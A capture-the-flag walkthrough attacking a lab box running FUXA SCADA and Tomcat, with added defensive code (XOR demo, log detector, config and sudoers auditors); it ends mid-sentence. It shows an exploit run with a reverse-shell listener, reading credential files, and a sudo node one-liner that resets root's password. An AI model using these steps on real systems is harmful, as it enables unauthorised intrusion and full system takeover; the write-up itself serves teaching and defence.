A sophisticated enterprise environment runs multiple critical services including SCADA systems, web applications, and mobile components. With proper reconnaissance and exploitation techniques, even the most complex infrastructures can be systematically compromised. 🎯 Time to demonstrate advanced penetration testing skills across multiple attack vectors!
Begin with comprehensive port scanning to identify all running services:
# Comprehensive port scan
nmap -Pn -sC -sV -p- 
# Expected services:
# 22/tcp   - SSH
# 80/tcp   - Apache HTTP Server
# 1881/tcp - FUXA SCADA system
# 4444/tcp - Closed (outbound traffic only)
# 8080/tcp - Apache Tomcat

The Apache HTTP server runs on port 80, which is the answer to the first question.
Use advanced directory enumeration tools to discover hidden paths:
# Using dirsearch (popular tool by @maurosoria and @shelld3v)
dirsearch -u http://
# Alternative tools:
gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt
ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ

Dirsearch is the popular directory enumeration tool developed by @maurosoria and @shelld3v.
Through directory enumeration, discover the backup directory containing an Android APK file:
# Access the backup directory
curl http:///backup/
# Download the APK file
wget http:///backup/MyFuxa.apk

Analyze the APK using jadx-gui, the popular Android decompilation tool:
# Decompile APK with jadx-gui
jadx-gui MyFuxa.apk
# Alternative command-line usage
jadx -d output_directory MyFuxa.apk
# In jadx-gui:
# 1. Load the APK file
# 2. Navigate through the source code
# 3. Look for API endpoints like /api/runscript
# 4. Find XOR-encrypted credentials for HTTP Basic Authentication

Jadx-gui is the popular GUI tool for decompiling Android applications that starts with 'J' and ends with 'X'.
Use CyberChef to decrypt the XOR-encrypted credentials found in the Android app:
# Steps in CyberChef:
# 1. Select "From Hex" operation
# 2. Use "XOR" function with the key found in the app ("send")
# 3. The output reveals plaintext credentials: webadmin:supersecurepassword
# XOR is commonly used in encryption to obfuscate data by toggling bits
# It's a reversible bitwise operation: A XOR B XOR B = A

CyberChef is the web-based tool used for decrypting the XOR-encrypted credentials, and XOR is the bitwise operation used for encryption.
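The CyberChef recipe above ("From Hex" followed by "XOR" with a repeating key) is a two-line operation in code, and writing it out makes the security point clearer: single-key XOR is reversible by anyone who holds the key, and because the key is shipped inside the APK it offers no confidentiality at all. The example below is added here and is not code from the original write-up; the sample blob, key and plaintext are constructed, not the CTF's actual values. It also shows the general weakness of repeating-key XOR: one known plaintext fragment (such as a predictable "user:" prefix) hands back the key.

```python
import binascii


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`; the same call both obfuscates and recovers."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_hex_decode(hex_blob: str, key: str) -> str:
    """Mirror of the CyberChef recipe: 'From Hex', then 'XOR' with the key."""
    return xor_bytes(binascii.unhexlify(hex_blob), key.encode()).decode()


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery: ct XOR pt yields the key stream, whose first
    key_len bytes are the repeating key (A XOR B XOR A = B)."""
    prefix = ciphertext[: len(known_plaintext)]
    return xor_bytes(prefix, known_plaintext)[:key_len]


# Constructed sample values (assumption: not the blob or credentials from the app).
SAMPLE_KEY = "send"
SAMPLE_PLAINTEXT = "user:pass"
SAMPLE_HEX = xor_bytes(SAMPLE_PLAINTEXT.encode(), SAMPLE_KEY.encode()).hex()


def demo() -> dict:
    """Round-trip the sample and show key recovery from a four-byte known prefix."""
    return {
        "decoded": xor_hex_decode(SAMPLE_HEX, SAMPLE_KEY),
        "recovered_key": recover_key(bytes.fromhex(SAMPLE_HEX), b"user", len(SAMPLE_KEY)),
    }


if __name__ == "__main__":
    print(demo())
```

The mitigation follows directly from the second function: secrets that must reach a mobile client should be short-lived, per-user tokens issued after authentication, not static credentials hidden behind a bitwise operation.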
Identify the FUXA system running on port 1881:
# Access FUXA web interface
curl http://:1881
# FUXA is an open-source tool for creating web-based SCADA, HMI, and dashboards
# Developed by the Frangoteam

FUXA is the open-source tool used for creating web-based SCADA, HMI, and dashboards, developed by Frangoteam.
Research FUXA vulnerabilities to identify the critical RCE vulnerability:
# Research FUXA CVEs
# CVE-2023-33831 - Unauthenticated RCE in FUXA
# Affects the /api/runscript endpoint
# Allows remote code execution through script injection

CVE-2023-33831 is the identifier for the critical RCE vulnerability affecting FUXA.
The FUXA RCE exploit requires authentication bypass. Analyze the authentication mechanism:
# The exploit needs to be updated with Basic Authentication
# FUXA may implement HTTP Basic Auth for API endpoints
# Credentials need to be discovered through other means

Basic Authentication is the type of authentication the FUXA RCE exploit needs to be updated with.
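From the defender's side, the endpoint named for CVE-2023-33831 is a concrete thing to watch: legitimate HMI traffic to /api/runscript comes from a small set of engineering hosts, so any other source posting to it deserves an alert, and a 401 followed by a 200 from the same source is the signature of an authentication hurdle being cleared. The following detector is added here and is not part of the original write-up; it assumes the FUXA instance sits behind a reverse proxy (or any server) that writes Apache combined-format access logs, and the log lines and addresses are constructed samples.

```python
import re
from collections import Counter

# Apache combined log format (constructed regex; handles the fields we need).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The endpoint named for CVE-2023-33831; POSTs here run scripts on the server.
WATCHED_PATHS = ("/api/runscript",)


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_runscript_calls(lines, allowlist=frozenset()):
    """Return (src, status) for every POST to a watched path from a host not allowlisted."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip rather than crash the detector
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path in WATCHED_PATHS and rec["src"] not in allowlist:
            hits.append((rec["src"], int(rec["status"])))
    return hits


def auth_bypass_suspects(hits):
    """Sources that received a 401 and later a 200 on the watched endpoint."""
    seen_401 = set()
    suspects = set()
    for src, status in hits:
        if status == 401:
            seen_401.add(src)
        elif status == 200 and src in seen_401:
            suspects.add(src)
    return suspects


# Constructed sample log; 10.0.0.7 stands in for a known engineering workstation.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /api/runscript HTTP/1.1" 401 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /api/runscript HTTP/1.1" 200 17',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /api/runscript HTTP/1.1" 200 17',
    'not a log line at all',
]
ENGINEERING_HOSTS = frozenset({"10.0.0.7"})


def report(lines=SAMPLE_LOG, allowlist=ENGINEERING_HOSTS):
    hits = find_runscript_calls(lines, allowlist)
    return {
        "hits": hits,
        "per_source": Counter(src for src, _ in hits),
        "auth_bypass_suspects": auth_bypass_suspects(hits),
    }


if __name__ == "__main__":
    print(report())
```

Run against the sample, the allowlisted host drops out, 10.0.0.9 is reported twice, and the 401-then-200 sequence flags it as having passed the authentication layer the write-up describes adding to the exploit.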
Analyze Apache Tomcat configuration to find authentication credentials:
# Access Tomcat manager (if accessible)
curl http://:8080/manager/
# The tomcat-users.xml file configures users and roles
# This file contains authentication credentials for Tomcat

tomcat-users.xml is the file used to configure users and roles in Apache Tomcat.
Modify the FUXA RCE exploit to include HTTP Basic Authentication with the decrypted credentials:
# Download and modify the FUXA exploit to include Basic Auth
# Key modifications:
# - Import requests and HTTPBasicAuth
# - Add authentication to the POST request
# - Use the decrypted credentials: webadmin:supersecurepassword
# Execute the modified exploit
python3 exploit.py --rhost  --rport 1881 --lhost  --lport 4444 --username webadmin --password supersecurepassword
# Set up reverse shell listener
nc -nvlp 4444

The exploit uses HTTPBasicAuth for authentication and targets the /api/runscript endpoint for RCE.
After gaining shell access as www-data, extract additional credentials from Tomcat configuration:
# Access Tomcat configuration directory
cat /usr/local/tomcat/conf/tomcat-users.xml
# This reveals higher-privilege credentials:
# Username: hackerpro
# Password: P@ssw0rd_12334445555

The tomcat-users.xml file contains credentials for the hackerpro user with broader system permissions.
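The lesson of this step is that a world-readable tomcat-users.xml with plaintext passwords turns one web-tier foothold into a reusable system credential. A small audit that parses the file and reports plaintext passwords and privileged manager roles is the kind of check a build pipeline or host agent can run. The script below is added here and is not code from the write-up; the XML is a constructed sample, and the "contains no `$`" heuristic for a plaintext password is an assumption based on Tomcat's digested-credential format (salt, iterations and hash joined with `$`).

```python
import xml.etree.ElementTree as ET

# Real Tomcat role names that grant manager/admin access.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}


def _local(tag: str) -> str:
    """Strip the XML namespace so <user> matches with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def looks_plaintext(password: str) -> bool:
    """Assumption: digested credentials contain '$' separators; anything else is plaintext."""
    return "$" not in password


def audit_tomcat_users(xml_text: str):
    """Return one finding dict per <user> that has a plaintext password or a privileged role."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name", "?")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        issues = []
        if looks_plaintext(el.get("password", "")):
            issues.append("plaintext password")
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            issues.append("privileged roles: " + ", ".join(privileged))
        if issues:
            findings.append({"user": name, "issues": issues})
    return findings


# Constructed sample; names and passwords are placeholders, not the CTF's values.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="reporting"/>
  <user username="ops_example" password="plaintext-example" roles="manager-gui,admin-gui"/>
  <user username="report_example" password="5f1a$10000$9c2e3b" roles="reporting"/>
</tomcat-users>
"""


def report(xml_text: str = SAMPLE_XML):
    return audit_tomcat_users(xml_text)


if __name__ == "__main__":
    for f in report():
        print(f["user"], "->", "; ".join(f["issues"]))
```

Only the first sample user is reported: it has both a plaintext password and manager roles. The second uses the digested form and an unprivileged role, so it is silent.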
Use the discovered credentials to SSH into the system as hackerpro:
# SSH into the hackerpro account
ssh hackerpro@
# Password: P@ssw0rd_12334445555
# Navigate to home directory and find user flag
ls -la /home/
find /home -name "flag-user.txt" 2>/dev/null
cat /home/hackerpro/flag-user.txt

The user flag is located in the /home directory as indicated by the hint.
Exploit privilege escalation through malicious JavaScript execution:
# Create malicious JavaScript file (from www-data reverse shell)
echo "require('child_process').exec('echo root:root | chpasswd');" > /var/www/html/betawebsite/FUXAendpoints/server/exploit.js
# Execute the malicious script as root using sudo
sudo /usr/local/bin/node /var/www/html/betawebsite/FUXAendpoints/server/exploit.js
# Gain root shell with changed password
su root
# Password: root

This technique uses sudo privileges to execute Node.js scripts that change the root password for privilege escalation.
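The root cause here is a sudo rule that lets a low-privilege account run an interpreter as root: once `node` (or python, perl, bash, ...) is the permitted command, the "script" argument is effectively arbitrary code, and a wildcard in the path widens it further. The audit below is added here and is not from the write-up; it parses sudoers-style rules and flags interpreter commands and wildcard arguments. The rules in the sample are constructed, including the www-data rule, which is an assumption about how this box's sudo privilege was granted.

```python
import re
from os.path import basename

# Interpreters that turn "run this file" into "run arbitrary code as the runas user".
INTERPRETERS = {"node", "nodejs", "python", "python3", "perl", "ruby", "bash", "sh", "php"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_rule(line: str):
    """Return the parsed fields of one user-specification line, or None."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    return m.groupdict() if m else None


def audit_sudoers(text: str):
    """Flag rules whose command is an interpreter or whose arguments contain a wildcard."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        for cmd in rule["cmds"].split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                continue  # unrestricted rules are a policy question, not this check's scope
            path = cmd.split()[0]
            reasons = []
            if basename(path) in INTERPRETERS:
                reasons.append(f"interpreter {basename(path)} runs arbitrary code")
            if "*" in cmd:
                reasons.append("wildcard lets the caller choose the file")
            if reasons:
                findings.append({
                    "user": rule["user"],
                    "runas": rule["runas"] or "root",
                    "nopasswd": "NOPASSWD" in (rule["tags"] or ""),
                    "command": cmd,
                    "reasons": reasons,
                })
    return findings


# Constructed sudoers sample; the www-data rule is an assumption, not text from the box.
SAMPLE_SUDOERS = """
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/local/bin/node /var/www/html/betawebsite/FUXAendpoints/server/*.js
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data /mnt/backup
"""


def report(text: str = SAMPLE_SUDOERS):
    return audit_sudoers(text)


if __name__ == "__main__":
    for f in report():
        print(f"{f['user']} -> {f['runas']} : {f['command']} ({'; '.join(f['reasons'])})")
```

Only the www-data rule is reported, for both reasons. The fix is to replace the interpreter with a fixed wrapper script owned by root (no wildcard, no user-writable path), or to drop the rule entirely and run the maintenance task from a root-owned service.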
With root access, retrieve the final flag:
# Find and read the root flag
find / -name "flag-root.txt" 2>/dev/null
cat /root/flag-root.txt

The complete attack chain involves: